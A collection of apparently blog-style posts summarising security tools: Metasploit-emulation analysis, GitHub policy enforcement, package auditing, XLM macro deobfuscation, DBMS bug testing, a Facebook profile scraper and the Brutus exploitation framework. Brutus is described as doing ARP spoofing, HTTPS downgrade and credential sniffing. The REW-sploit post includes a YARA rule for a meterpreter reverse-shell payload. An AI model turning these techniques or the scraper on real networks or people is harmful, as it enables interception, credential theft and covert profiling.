cat urls.txt | jsleak -pattern regex.txt
[+] Url: http://localhost/index.js
[+] Pattern: p([a-z]+)ch
[+] Match: peach

To Do
  • Fix output
  • Add more patterns
  • Add stdin
  • Implement JSON input
  • Fix patterns
  • Implement PCRE

Regex list

Inspired by

Thanks

@fepame, @gustavorobertux, @Jhounx, @arthurair_es



Allstar - GitHub App To Set And Enforce Security Policies

19 August 2021 at 12:30
By: Zion3R


Allstar is a GitHub App installed on organizations or repositories to set and enforce security policies. Its goal is to be able to continuously monitor and detect any GitHub setting or repository file contents that may be risky or do not follow security best practices. If Allstar finds a repository to be out of compliance, it will take an action such as create an issue or restore security settings.

The specific policies are intended to be highly configurable, to try to meet the needs of different project communities and organizations. Also, developing and contributing new policies is intended to be easy.

Allstar is developed under the OpenSSF organization, as a part of the Securing Critical Projects Working Group. The OpenSSF runs an instance of Allstar here for anyone to install and use on their GitHub organizations. However, Allstar can be run by anyone if need be, see the operator docs for more details.


Quick start

Install Allstar GitHub App on your organizations and repositories. When installing Allstar, you may review the permissions requested. Allstar asks for read access to most settings and file contents to detect security compliance. It requests write access to issues to create issues, and to checks to allow the block action.

Follow the quick start instructions to setup the configuration files needed to enable Allstar on your repositories. For more details on advanced configuration, see below.


Help! I'm getting issues created by Allstar and I don't want them.

Enable Configuration

Allstar can be enabled on individual repositories at the app level, with the option of enabling or disabling each security policy individually. For organization-level configuration, create a repository named .allstar in your organization. Then create a file called allstar.yaml in that repository.

Allstar can either be set to an opt-in or opt-out strategy. In opt-in, only those repositories explicitly listed are enabled. In opt-out, all repositories are enabled, and repositories would need to be explicitly added to opt-out. Allstar is set to opt-in by default, and therefore is not enabled on any repository immediately after installation. To continue with the default opt-in strategy, list the repositories for Allstar to be enabled on in your organization like so:

optConfig:
optInRepos:
- repo-one
- repo-two

To switch to the opt-out strategy (recommended), set that option to true:

optConfig:
optOutStrategy: true

If you wish to enable Allstar on all but a few repositories, you may use opt-out and list the repositories to disable:

optConfig:
optOutStrategy: true
optOutRepos:
- repo-one
- repo-two

Repository Override

Individual repositories can also opt in or out using configuration files inside those repositories. For example, if the organization is configured with the opt-out strategy, a repository may opt itself out by including the file .allstar/allstar.yaml with the contents:

optConfig:
optOut: true

Conversely, this allows repositories to opt-in and enable Allstar when the organization is configured with the opt-in strategy. Because opt-in is the default strategy, this is how Allstar works if the .allstar repository doesn't exist.

At the organization-level allstar.yaml, repository override may be disabled with the setting:

optConfig:
disableRepoOverride: true

This allows an organization-owner to have a central point of approval for repositories to request an opt-out through a GitHub PR. Understandably, Allstar or individual policies may not make sense for all repositories.


Policy Enable

Each individual policy configuration file (see below) also contains the exact same optConfig configuration object. This allows granularity to enable policies on individual repositories. A policy will not take action unless it is enabled and Allstar is enabled as a whole.


Definition

Actions

Each policy can be configured with an action that Allstar will take when it detects a repository to be out of compliance.

  • log: This is the default action, and actually takes place for all actions. All policy run results and details are logged. Logs are currently only visible to the app operator, plans to expose these are under discussion.
  • issue: This action creates a GitHub issue. Only one issue is created per policy, and the text describes the details of the policy violation. If the issue is already open, it is pinged with a comment every 24 hours (not currently user configurable). Once the violation is addressed, the issue will be automatically closed by Allstar within 5-10 minutes.
  • fix: This action is policy specific. The policy will make the changes to the GitHub settings to correct the policy violation. Not all policies will be able to support this (see below).

Proposed, but not yet implemented actions. Definitions will be added in the future.

  • block: Allstar can set a GitHub Status Check and block any PR in the repository from being merged if the check fails.
  • email: Allstar would send an email to the repository administrator(s).
  • rpc: Allstar would send an rpc to some organization-specific system.

Policies

Similar to the Allstar app enable configuration, all policies are enabled and configured with a yaml file in either the organization's .allstar repository, or the repository's .allstar directory. As with the app, policies are opt-in by default, also the default log action won't produce visible results. A simple way to enable all policies is to create a yaml file for each policy with the contents:

optConfig:
optOutStrategy: true
action: issue

The fix action is not implemented in any policy yet, but will be implemented in those policies where it is applicable soon.


Branch Protection

This policy's config file is named branch_protection.yaml, and the config definitions are here.

The branch protection policy checks that GitHub's branch protection settings are setup correctly according to the specified configuration. The issue text will describe which setting is incorrect. See GitHub's documentation for correcting settings.


Binary Artifacts

This policy's config file is named binary_artifacts.yaml, and the config definitions are here.

This policy incorporates the check from scorecard. Remove the binary artifact from the repository to achieve compliance. As the scorecard results can be verbose, you may need to run scorecard itself to see all the detailed information.


Outside Collaborators

This policy's config file is named outside.yaml, and the config definitions are here.

This policy checks if any Outside Collaborators have either administrator(default) or push(optional) access to the repository. Only organization members should have this access, as otherwise untrusted members can change admin level settings and commit malicious code.


SECURITY.md

This policy's config file is named security.yaml, and the config definitions are here.

This policy checks that the repository has a security policy file in SECURITY.md and that it is not empty. The created issue will have a link to the GitHub tab that helps you commit a security policy to your repository.


Future Policies

Example Config Repository

See this repo as an example of Allstar config being used. As the organization administrator, consider a README.md with some information on how Allstar is being used in your organization.


Contribute Policies

Interface definition.

Both the SECURITY.md and Outside Collaborators policies are quite simple to understand and good examples to copy.



REW-sploit - Emulate And Dissect MSF And *Other* Attacks

19 August 2021 at 21:30
By: Zion3R


REW-sploit

The tool has been presented at Black-Hat Arsenal USA 2021

https://www.blackhat.com/us-21/arsenal/schedule/index.html#rew-sploit-dissecting-metasploit-attacks-24086

Slides of presentation are available at https://github.com/REW-sploit/REW-sploit_docs


Need help in analyzing Windows shellcode or attack coming from Metasploit Framework or Cobalt Strike (or may be also other malicious or obfuscated code)? Do you need to automate tasks with simple scripting? Do you want help to decrypt MSF generated traffic by extracting keys from payloads?

REW-sploit is here to help Blue Teams!

Here a quick demo:


Install

Installation is very easy. I strongly suggest to create a specific Python Env for it:

# python -m venv <your-env-path>/rew-sploit
# source <your-env-path>/bin/activate
# git clone https://github.com/REW-sploit/REW-sploit.git
# cd REW-sploit
# pip install -r requirements.txt
# ./apply_patch.py -f
# ./rew-sploit

If you prefer, you can use the Dockerfile. To create the image:

docker build -t rew-sploit/rew-sploit .

and then start it (sharing the /tmp/ folder):

docker run --rm -it --name rew-sploit -v /tmp:/tmp rew-sploit/rew-sploit

You see an apply_patch.py script in the installation sequence. This is required to apply a small patch to the speakeasy-emulator (https://github.com/fireeye/speakeasy/) to make it compatible with REW-sploit. You can easily revert the patch with ./apply_patch.py -r if required.

Optionally, you can also install Cobalt-Strike Parser:

# cd REW-sploit/extras
# git clone https://github.com/Sentinel-One/CobaltStrikeParser.git

Standing on the shoulder of giants

REW-sploit is based on a couple of great frameworks, Unicorn and speakeasy-emulator (but also other libraries). Thanks to everyone and thanks to the OSS movement!


How it works

In general we can say that whilst Red Teams have a lot of tools helping them in "automating" attacks, Blue Teams are a bit "tool-less". So, what I thought is to build something to help Blue Team Analysis.

REW-sploit can get a shellcode/DLL/EXE, emulate the execution, and give you a set of information to help you in understanding what is going on. Example of extracted information are:

You can find several examples on the current capabilities here below:


Fixups

In some cases emulation was simply breaking, for different reasons. In some cases obfuscation was using some techniques that was confusing the emulation engine. So I implemented some ad-hoc fixups (you can enable them by using -F option of the emulate_payload command). Fixups are implemented in modules/emulate_fixups.py. Currently we have

Unicorn issue #1092:

    #
# Fixup #1
# Unicorn issue #1092 (XOR instruction executed twice)
# https://github.com/unicorn-engine/unicorn/issues/1092
# #820 (Incorrect memory view after running self-modifying code)
# https://github.com/unicorn-engine/unicorn/issues/820
# Issue: self modfying code in the same Translated Block (16 bytes?)
# Yes, I know...this is a huge kludge... :-/
#

FPU emulation issue:

    #
# Fixup #2
# The "fpu" related instructions (FPU/FNSTENV), used to recover EIP, sometimes
# returns the wrong addresses.
# In this case, I need to track the first FPU instruction and then place
# its address in STACK when FNSTENV is called
#

Trap Flag evasion:

    #
# Fixup #3
# Trap Flag evasion technique
# https://unit42.paloaltonetworks.com/single-bit-trap-flag-intel-cpu/
#
# The call of the RDTSC with the trap flag enabled, cause an unhandled
# interrupt. Example code:
# pushf
# or dword [esp], 0x100
# popf
# rdtsc
#
# Any call to RDTSC with Trap Flag set will be intercepted and TF will
# be cleared
#

Customize YARA rules

File modules/emulate_rules.py contains the YARA rules used to intercept the interesting part of the code, in order to implement instrumentation. I tried to comment as much as possible these sections in order to let you create your own rule (please share them with a pull request if you think they can help others). For example:

#
# Payload Name: [MSF] windows/meterpreter/reverse_tcp_rc4
# Search for : mov esi,dword ptr [esi]
# xor esi,0x<const>
# Used for : this xor instruction contains the constant used to
# encrypt the lenght of the payload that will be sent as 2nd
# stage
# Architecture: x32
#
yara_reverse_tcp_rc4_xor_32 = 'rule reverse_tcp_rc4_xor { \
strings: \
$opcodes_1 = { 8b 36 \
81 f6 ?? ?? ?? ?? } \
condition: \
$opcodes_1 }'

Issues

Please, open Issues if you find something that not work or that can be improved. Thanks!



FisherMan - CLI Program That Collects Information From Facebook User Profiles Via Selenium

20 August 2021 at 12:30
By: Zion3R


Search for public profile information on Facebook


Installation
# clone the repo
$ git clone https://github.com/Godofcoffe/FisherMan

# change the working directory to FisherMan
$ cd FisherMan

# install the requirements
$ python3 -m pip install -r requirements.txt

Pre-requisites
  • Make sure you have the executable "geckodriver" installed on your machine.

Usage
facebook profiles. (Version 3.4.0) optional arguments: -h, --help show this help message and exit --version Shows the current version of the program. -u USERNAME [USERNAME ...], --username USERNAME [USERNAME ...] Defines one or more users for the search. -i ID [ID ...], --id ID [ID ...] Set the profile identification number. --use-txt TXT_FILE Replaces the USERNAME parameter with a user list in a txt. -S USER, --search USER It does a shallow search for the username. Replace the spaces with '.'(period). -sf, --scrape-family If this parameter is passed, the information from family members will be scraped if available. --specify {0,1,2,3,4,5} [{0,1,2,3,4,5} ...] Use the index number to return a specific part of the page. about: 0,about_contact_and_basic_info: 1,about_family_and_relationships: 2,about_details: 3,about_work_and_education: 4,about_places: 5. -s, --several Returns extra data like profile picture, number of followers and friends. -b, --browser Opens the browser/bot. --email EMAIL If the profile is blocked, you can define your account, however you have the search user in your friends list. --password PASSWORD Set the password for your facebook account, this parameter has to be used with --email. -o, --file-output Save the output data to a .txt file. -c, --compact Compress all .txt files. Use together with -o. -v, -d, --verbose, --debug It shows in detail the data search process. -q, --quiet Eliminates and simplifies some script outputs for a simpler and more discrete visualization. ">
$ python3 fisherman.py --help
usage: fisherman.py [-h] [--version] [-u USERNAME [USERNAME ...] | -i ID
[ID ...] | --use-txt TXT_FILE | -S USER] [-sf]
[--specify {0,1,2,3,4,5} [{0,1,2,3,4,5} ...]] [-s] [-b]
[--email EMAIL] [--password PASSWORD] [-o] [-c] [-v | -q]

FisherMan: Extract information from facebook profiles. (Version 3.4.0)

optional arguments:
-h, --help show this help message and exit
--version Shows the current version of the program.
-u USERNAME [USERNAME ...], --username USERNAME [USERNAME ...]
Defines one or more users for the search.
-i ID [ID ...], --id ID [ID ...]
Set the profile identification number.
--use-txt TXT_FILE Replaces the USERNAME parameter with a user list in a
txt.
-S USER, --search USER
It does a shallow search for the username. Replace the
spaces with '.'(period).
-sf, --scrape-family If this parameter is passed, the information from
family members will be scraped if available.
--specify {0,1,2,3,4,5} [{0,1,2,3,4,5} ...]
Use the index number to return a specific part of the
page. about: 0,about_contact_and_basic_info:
1,about_family_and_relationships: 2,about_details:
3,about_work_and_education: 4,about_places: 5.
-s, --several Returns extra data like profile picture, number of
followers and friends.
-b, --browser Opens the browser/bot.
--email EMAIL If the profile is blocked, you can define your
account, however you have the search user in your
fri ends list.
--password PASSWORD Set the password for your facebook account, this
parameter has to be used with --email.
-o, --file-output Save the output data to a .txt file.
-c, --compact Compress all .txt files. Use together with -o.
-v, -d, --verbose, --debug
It shows in detail the data search process.
-q, --quiet Eliminates and simplifies some script outputs for a
simpler and more discrete visualization.

To search for a user:

  • User name: python3 fisherman.py -u name name.profile name.profile2
  • ID: python3 fisherman.py -i 000000000000

The username must be found on the facebook profile link, such as:

https://facebook.com/name.profile/

It is also possible to load multiple usernames from a .txt file, this can be useful for a brute force output type:

python3 fisherman.py --use-txt filename.txt

Some profiles are limited to displaying your information for any account, so you can use your account to extract. Note: this should be used as the last hypothesis, and the target profile must be on your friends list:

python3 fisherman.py --email [email protected] --password yourpass

Some situations:
  • For complete massive scrape:

    python3 fisherman.py --use-txt file -o -c -sf

    With a file with dozens of names on each line, you can make a complete "scan" taking your information and even your family members and will be compressed into a .zip at the output.

  • For specific parts of the account:

    • Basic data: python3 fisherman.py -u name --specify 0
    • Family and relationship: python3 -u name --specify 2
    • It is still possible to mix: python3 fisherman.py -u name --specify 0 2
  • To get additional things like profile picture, how many followers and how many friends:

    python3 fisherman.py -u name -s

This tool only extracts information that is public, not use for private or illegal purposes.

LICENSE

BSD 3-Clause ยฉ FisherMan Project

Original Creator - Godofcoffe



PackageDNA - Tool To Analyze Software Packages Of Different Programming Languages That Are Being Or Will Be Used In Their Codes

20 August 2021 at 21:30
By: Zion3R


This tool gives developers, researchers and companies the ability to analyze software packages of different programming languages that are being or will be used in their codes, providing information that allows them to know in advance if this library complies with processes. secure development, if currently supported, possible backdoors (malicious embedded code), typosquatting analysis, the history of versions and reported vulnerabilities (CVEs) of the package.


Installation

Clone this repository with:

git clone https://github.com/ElevenPaths/packagedna

PackageDNA uses python-magic which is a simple wrapper around the libmagic C library, and that MUST be installed as well:

Debian/Ubuntu
$ sudo apt-get install libmagic1

Windows
You will need DLLs for libmagic. @julian-r has uploaded a version of this project that includes binaries
to PyPI: https://pypi.python.org/pypi/python-magic-bin/0.4.14
Other sources of the libraries in the past have been File for Windows.
You will need to copy the file magic out of [binary-zip]\share\misc, and pass its location to Magic(magic_file=...).

If you are using a 64-bit build of python, you will need 64-bit libmagic binaries which can be found here: https://github.com/pidydx/libmagicwin64.
Newer version can be found here: https://github.com/nscaife/file-windows.

OSX
When using Homebrew: brew install libmagic
When using macports: port install file


More details: https://pypi.org/project/python-magic/

Run setup for installation:

python3 setup.py install --user

External Modules

PackageDNA uses external modules for its analysis that you should install previously:

Microsoft AppInpsector

https://github.com/microsoft/ApplicationInspector

Virus Total API

https://www.virustotal.com/

LibrariesIO API

https://libraries.io/

Rubocop

https://github.com/rubocop/rubocop

After installation you should configure the external modules, in the option [7] Configuration of the main menu.

VirusTotal API Key: Your API KEY [2] AppInspector absolute path: /Local/Path/MSAppInpsectorInstallation [3] Libraries.io API Key: Your API KEY [4] Github Token: Your Token [B] Back [X] Exit ">
[1] VirusTotal API Key: Your API KEY
[2] AppInspector absolute path: /Local/Path/MSAppInpsectorInstallation
[3] Libraries.io API Key: Your API KEY
[4] Github Token: Your Token
[B] Back
[X] Exit

NOTE: External modules are not mandatory. PackageDNA will continue its execution, however we recommend making all the configurations of these modules so that the tool performs a complete analysis


Running PackageDNA

Inside the PackageDNA directory:

./packagedna.py
Analyzer Framework By ElevenPaths https://www.elevenpaths.com/ Usage: python3 ./packagedna.py [*] -------------------------------------------------------------------------------------------------------------- [*] [!] Select from the menu: [*] -------------------------------------------------------------------------------------------------------------- [*] [1] Analyze Package (Last Version) [2] Analyze Package (All Versions) [3] Analyze local package [4] Information gathering [5] Upload file and analyze all Packages [6] List previously analyzed packages [7] Configurations [X] Exit [*] -------------------------------------------------------------------------------------------------------------- [*] [!] Enter your selection: ">
_____              _                          ____     __     _  _______ 
| __ \ | | | __ \ | \ | || ___ |
| |__) |__ __ ____ | | __ __ __ ____ ___ | | \ \ | |\ \ | || |___| |
| ___// _` |/ __)| |/ / / _` | / _ | / _ \| | | || | \ \| || ___ |
| | | (_| || (__ | |\ \ | (_| || (_| || __/| |__/ / | | \ || | | |
|_| \__,_|\____)|_| \_\ \__,_| \__ | \___||_____/ |_| \__||_| |_|
__| |
(____|

Modular Packages Analyzer Framework
By ElevenPaths https://www.elevenpaths.com/
Usage: python3 ./packagedna.py

[*] -------------------------------------------------------------------------------------------------------------- [*]
[!] Select from the menu:
[*] -------------------------------------------------------------------------------------------------------------- [*]
[1] Analy ze Package (Last Version)
[2] Analyze Package (All Versions)
[3] Analyze local package
[4] Information gathering
[5] Upload file and analyze all Packages
[6] List previously analyzed packages
[7] Configurations
[X] Exit
[*] -------------------------------------------------------------------------------------------------------------- [*]
[!] Enter your selection:


Brutus - An Educational Exploitation Framework Shipped On A Modular And Highly Extensible Multi-Tasking And Multi-Processing Architecture

21 August 2021 at 12:30
By: Zion3R


An educational exploitation framework shipped on a modular and highly extensible multi-tasking and multi-processing architecture.


Brutus: an Introduction

Looking for version 1? See the branches in this repository.

Brutus is an educational exploitation framework written in Python. It automates pre and post-connection network-based exploits, as well as web-based reconnaissance. As a light-weight framework, Brutus aims to minimize reliance on third-party dependencies. Optimized for Kali Linux, Brutus is also compatible with macOS and most Linux distributions, featuring a fully interactive command-line interface and versatile plugin system.

Brutus features a highly-extensible, modular architecture. The included exploits (plugins layer) consists of several decoupled modules that run on a 'tasking layer' comprised of thread pools and thread-safe, async queues (whichever is most appropriate for the given module). The main thread runs atop a multi-processing pool that manages app context and dispatches new processes so tasks can run in the background, in separate shells, etc.

The UI layer is also decoupled and extensible. By default, Brutus ships with a menu-based command-line interface UI but there's no reason you can't add adapters for a GUI, an argument parser, or even an HTTP API or remote procedure call.

Last, Brutus has a utility layer with common faculties for file-system operations, shell (terminal emulator) management, persistence methods, and system metadata.

If you're just interested in some Python hacking, feel free to pull the scripts directly - each module can be invoked standalone.


Demos

Web Scanning and Payload Compilation Demo: watch mp4ย 


Installation

You will probably want the following dependencies:

  • sslstrip
  • pipenv

Brutus is optimized for Kali Linux. There's lots of information online about how to run Kali Linux in a VM.

To install:

pipenv install

Usage

Run:

pipenv run brutus

Test:

pipenv run test

Lint:

pipenv run lint

Setup Git Hooks for Development:

pipenv run setup

Feel free to open PRs with feature proposals, bugfixes, et al. Note that much of this project is still in progress. The base is there and ready for you to build upon.


Brutus: Features and Included Modules

Brutus includes several modules which can be generalized as belonging to three macro-categories: network-based, web-based, and payloads. The latter category is a library of compilers and accompanying payloads - payloads can be compiled via Brutus' interactive command-line menu; compiled payloads can subsequently be loaded into many of Brutus' applicable network-based modules.

The base layer of Brutus utilizes POSIX threads for concurrent multi-tasking. Some modules - i.e. essentially anything heavily I/O bound - instead utilize Python's async I/O libraries and run on an abstraction atop Python's default event loop.

Included Utilities/Scripts

  • IP Table Management
  • Downgrade HTTPS to HTTP
  • Enable Monitor Mode
  • Enable Port Forwarding
  • Keylogger

Documentation

48-bit MAC Address Changer (view source)

NOTE: This tool is for 48-bit MACs, with a %02x default byte format.

MAC (Media Access Control) is a permanent, physical, and unique address assigned to network interfaces by device manufacturers. This means even your wireless card, for instance, has its own unique MAC address.

The MAC address, analogous to an IP on the internet, is utilized within a network in order to facilitate the proper delivery of resources and data (i.e. packets). An interaction will generally consist of a source MAC and a destination MAC. MAC addresses can identify you, be filtered, or otherwise access-restricted.

Important to note is these unique addresses are not ephemeral; they are persistent and will remain associated with a device were a user to install it in another machine. But the two don't have to be inextricably intertwined...

This module will accept as user-input any given wireless device and any valid MAC address to which the user wishes to reassign said device. The program is simple such that I need not explain it much further: it utilizes the subprocess module to automate the sequence of the necessary shell commands to bring the wireless interface down, reassign the MAC, and reinitialize it.

If you are actively changing your MAC address, it might be prudent to have some sort of validation structure or higher order method to ensure that 1) the wireless device exists, 2) the wireless device accommodates a MAC address, 3) the user-input MAC address is of a valid format, and 4) the wireless device's MAC address has successfully been updated. This tool automates these functions.

By selecting the 'generate' option in lieu of a specific MAC address, the program will generate a valid MAC address per IEEE specifications. I'm excited to have implemented extended functionality for generating not only wholly random (and valid) MAC addresses, but MAC addresses which either begin with a specific vendor prefix (OUI), or are generated with multicast and/or UAA options. These options trigger byte-code logic in the generator method, which are augmented per IEEE specifications. Learn more about MAC addresses here.


ARP-Based Network Scanner (view source)

The network scanner is another very useful tool, and a formidable one when used in conjunction with the aforementioned MAC changer. This scanner utilizes ARP request functionality by accepting as user input a valid ipv4 or ipv6 IP address and accompanying - albeit optional - subnet range.

The program then takes the given IP and/or range, then validates them per IEEE specifications (again, this validation is run against ipv4 and ipv6 standards). Finally, a broadcast object is instantiated with the given IP and a generated ethernet frame; this object returns to us a list of all connected devices within the given network and accompanying range, mapping their IPs to respective MAC addresses.

The program outputs a table with these associations, which then might be used as input for the MAC changer should circumstances necessitate it.


Automated ARP Spoofing (view source)

The ARP Spoof module enables us to redirect the flow of packets in a given network by simultaneously manipulating the ARP tables of a given target client and its network's gateway. This module auto-enables port forwarding during this process, and dynamically constructs and sends ARP packets.

When the module is terminated by the user, the targets' ARP tables are reset, so as not to leave the controller in a precarious situation (plus, it's the nice thing to do).

Because this process places the controller in the middle of the packet-flow between the client and AP, the controller therefore has access to all dataflow (dealing with potential encryption of said data is a task for another script). From here, the myriad options for packet-flow orchestration become readily apparent: surrogation of code by way of automation and regular expressions, forced redirects, remote access, et al. Fortunately, Brutus can automate this, too.


HTTP Packet Sniffer (view source)

The packet sniffer is an excellent module to employ after running the ARP Spoofer; it creates a dataflow of all intercepted HTTP packets' data which includes either URLs, or possible user credentials.

The script is extensible and can accommodate a variety of protocols by instantiating the listener object with one of many available filters. Note that Brutus automatically downgrades HTTPS, so unless HSTS is involved, the dataflow should be viable for reconnaissance.

Disclaimer: This software and all contents therein were created for research use only. I neither condone nor hold, in any capacity, responsibility for the actions of those who might intend to use this software in a manner malicious or otherwise illegal.



XLMMacroDeobfuscator - Extract And Deobfuscate XLM Macros (A.K.A Excel 4.0 Macros)

21 August 2021 at 21:30
By: Zion3R


XLMMacroDeobfuscator can be used to decode obfuscated XLM macros (also known as Excel 4.0 macros). It utilizes an internal XLM emulator to interpret the macros, without fully performing the code.

It supports both xls, xlsm, and xlsb formats.

It uses xlrd2, pyxlsb2 and its own parser to extract cells and other information from xls, xlsb and xlsm files, respectively.

You can also find XLM grammar in xlm-macro-lark.template


Installing the emulator
  1. Install using pip
pip install XLMMacroDeobfuscator
  1. Installing the latest development
pip install -U https://github.com/DissectMalware/xlrd2/archive/master.zip
pip install -U https://github.com/DissectMalware/pyxlsb2/archive/master.zip
pip install -U https://github.com/DissectMalware/XLMMacroDeobfuscator/archive/master.zip

Running the emulator

To deobfuscate macros in Excel documents:

xlmdeobfuscator --file document.xlsm

To only get the deobfuscated macros and without any indentation:

xlmdeobfuscator --file document.xlsm --no-indent --output-formula-format "[[INT-FORMULA]]"

To export the output in JSON format

xlmdeobfuscator --file document.xlsm --export-json result.json

To see a sample JSON output, please check this link out.

To use a config file

xlmdeobfuscator --file document.xlsm -c default.config

default.config file must be a valid json file, such as:

{
"no-indent": true,
"output-formula-format": "[[CELL-ADDR]] [[INT-FORMULA]]",
"non-interactive": true,
"output-level": 1
}

Command Line
emulation after N seconds (0: not interruption N>0: stop emulation after N seconds) ">

_ _______
|\ /|( \ ( )
( \ / )| ( | () () |
\ (_) / | | | || || |
) _ ( | | | |(_)| |
/ ( ) \ | | | | | |
( / \ )| (____/\| ) ( |
|/ \|(_______/|/ \|
______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
| ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
| | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
| | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
| | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
| (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
(______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/


XLMMacroDeobfuscator(v0.1.7) - https://github.com/DissectMalware/XLMMacroDeobfuscator

usage: deobfuscator.py [-h] [-c FILE_PATH] [-f FILE_PATH] [-n] [-x] [-2]
[--with-ms-excel] [-s] [-d DAY]
[--output-formula-format OUTPUT_FORMULA_FORMAT]
[--no-indent] [--export-json FILE_PATH]
[--start-point CELL_ADDR] [-p PASSWORD]
[-o OUTPUT_LEVEL]

optional arguments:
-h, --help show this help message and exit
-c FILE_PATH, --config_file FILE_PATH
Specify a config file (must be a valid JSON file)
-f FILE_PATH, --file FILE_PATH
The path of a XLSM file
-n , --noninteractive Disable interactive shell
-x, --extract-only Only extract cells without any emulation
-2, --no-ms-excel [Deprecated] Do not use MS Excel to process XLS files
--with-ms-excel Use MS Excel to process XLS files
-s, --start-with-shell
Open an XLM shell before interpreting the macros in
the input
-d DAY, --day DAY Specify the day of month
--output-formula-format OUTPUT_FORMULA_FORMAT
Specify the format for output formulas ([[CELL-ADDR]],
[[INT-FORMULA]], and [[STATUS]]
--no-indent Do not show indent before formulas
--export-json FILE_PATH
Export the output to JSON
--start-point CELL_ADDR
Start interpretation from a specific cell address
-p PASSWORD, --password PASSWORD
Password to decrypt t he protected document
-o OUTPUT_LEVEL, --output-level OUTPUT_LEVEL
Set the level of details to be shown (0:all commands,
1: commands no jump 2:important commands 3:strings in
important commands).
--timeout N stop emulation after N seconds (0: not interruption
N>0: stop emulation after N seconds)

Library

The following example shows how XLMMacroDeobfuscator can be used in a python project to deobfuscate XLM macros:

from XLMMacroDeobfuscator.deobfuscator import process_file

result = process_file(file='path/to/an/excel/file',
noninteractive= True,
noindent= True,
output_formula_format='[[CELL-ADDR]], [[INT-FORMULA]]',
return_deobfuscated= True,
timeout= 30)

for record in result:
print(record)
  • note: the xlmdeofuscator logo will not be shown when you use it as a library

Requirements

Please read requirements.txt to get the list of python libraries that XLMMacroDeobfuscator is dependent on.

xlmdeobfuscator can be executed on any OS to extract and deobfuscate macros in xls, xlsm, and xlsb files. You do not need to install MS Excel.

Note: if you want to use MS Excel (on Windows), you need to install pywin32 library and use --with-ms-excel switch. If --with-ms-excel is used, xlmdeobfuscator, first, attempts to load xls files with MS Excel, if it fails it uses xlrd2 library.


Project Using XLMMacroDeofuscator

XLMMacroDeofuscator is adopted in the following projects:

Please contact me if you incorporated XLMMacroDeofuscator in your project.


How to Contribute

If you found a bug or would like to suggest an improvement, please create a new issue on the issues page.

Feel free to contribute to the project forking the project and submitting a pull request.

You can reach me (@DissectMlaware) on Twitter via a direct message.



SQLancer - Detecting Logic Bugs In DBMS

22 August 2021 at 12:30
By: Zion3R


SQLancer (Synthesized Query Lancer) is a tool to automatically test Database Management Systems (DBMS) in order to find logic bugs in their implementation. We refer to logic bugs as those bugs that cause the DBMS to fetch an incorrect result set (e.g., by omitting a record).

SQLancer operates in the following two phases:

  1. Database generation: The goal of this phase is to create a populated database, and stress the DBMS to increase the probability of causing an inconsistent database state that could be detected subsequently. First, random tables are created. Then, randomly SQL statements are chosen to generate, modify, and delete data. Also other statements, such as those to create indexes as well as views and to set DBMS-specific options are sent to the DBMS.
  2. Testing: The goal of this phase is to detect the logic bugs based on the generated database. See Testing Approaches below.

Getting Started

Requirements:

  • Java 8 or above
  • Maven (sudo apt install maven on Ubuntu)
  • The DBMS that you want to test (SQLite is an embedded DBMS and is included)

The following commands clone SQLancer, create a JAR, and start SQLancer to test SQLite using Non-optimizing Reference Engine Construction (NoREC):

git clone https://github.com/sqlancer/sqlancer
cd sqlancer
mvn package -DskipTests
cd target
java -jar sqlancer-*.jar --num-threads 4 sqlite3 --oracle NoREC

If the execution prints progress information every five seconds, then the tool works as expected. Note that SQLancer might find bugs in SQLite. Before reporting these, be sure to check that they can still be reproduced when using the latest development version. The shortcut CTRL+C can be used to terminate SQLancer manually. If SQLancer does not find any bugs, it executes infinitely. The option --num-tries can be used to control after how many bugs SQLancer terminates. Alternatively, the option --timeout-seconds can be used to specify the maximum duration that SQLancer is allowed to run.

If you launch SQLancer without parameters, available options and commands are displayed. Note that general options that are supported by all DBMS-testing implementations (e.g., --num-threads) need to precede the name of DBMS to be tested (e.g., sqlite3). Options that are supported only for specific DBMS (e.g., --test-rtree for SQLite3), or options for which each testing implementation provides different values (e.g. --oracle NoREC) need to go after the DBMS name.


Research Prototype

This project should at this stage still be seen as a research prototype. We believe that the tool is not ready to be used. However, we have received many requests by companies, organizations, and individual developers, which is why we decided to prematurely release the tool. Expect errors, incompatibilities, lack of documentation, and insufficient code quality. That being said, we are working hard to address these issues and enhance SQLancer to become a production-quality piece of software. We welcome any issue reports, extension requests, and code contributions.


Testing Approaches
Approach Description
Pivoted Query Synthesis (PQS) PQS is the first technique that we designed and implemented. It randomly selects a row, called a pivot row, for which a query is generated that is guaranteed to fetch the row. If the row is not contained in the result set, a bug has been detected. It is fully described here. PQS is the most powerful technique, but also requires more implementation effort than the other two techniques. It is currently unmaintained.
Non-optimizing Reference Engine Construction (NoREC) NoREC aims to find optimization bugs. It is described here. It translates a query that is potentially optimized by the DBMS to one for which hardly any optimizations are applicable, and compares the two result sets. A mismatch between the result sets indicates a bug in the DBMS.
Ternary Logic Partitioning (TLP) TLP partitions a query into three partitioning queries, whose results are composed and compare to the original query's result set. A mismatch in the result sets indicates a bug in the DBMS. In contrast to NoREC and PQS, it can detect bugs in advanced features such as aggregate functions.

Please find the .bib entries here.


Supported DBMS

Since SQL dialects differ widely, each DBMS to be tested requires a separate implementation.

DBMS Status Expression Generation Description
SQLite Working Untyped This implementation is currently affected by a significant performance regression that still needs to be investigated
MySQL Working Untyped Running this implementation likely uncovers additional, unreported bugs.
PostgreSQL Working Typed
Citus (PostgreSQL Extension) Working Typed This implementation extends the PostgreSQL implementation of SQLancer, and was contributed by the Citus team.
MariaDB Preliminary Untyped The implementation of this DBMS is very preliminary, since we stopped extending it after all but one of our bug reports were addressed. Running it likely uncovers additional, unreported bugs.
CockroachDB Working Typed
TiDB Working Untyped
DuckDB Working Untyped, Generic
ClickHouse Preliminary Untyped, Generic Implementing the different table engines was not convenient, which is why only a very preliminary implementation exists.
TDEngine Removed Untyped We removed the TDEngine implementation since all but one of our bug reports were still unaddressed five months after we reported them.

Using SQLancer

Logs

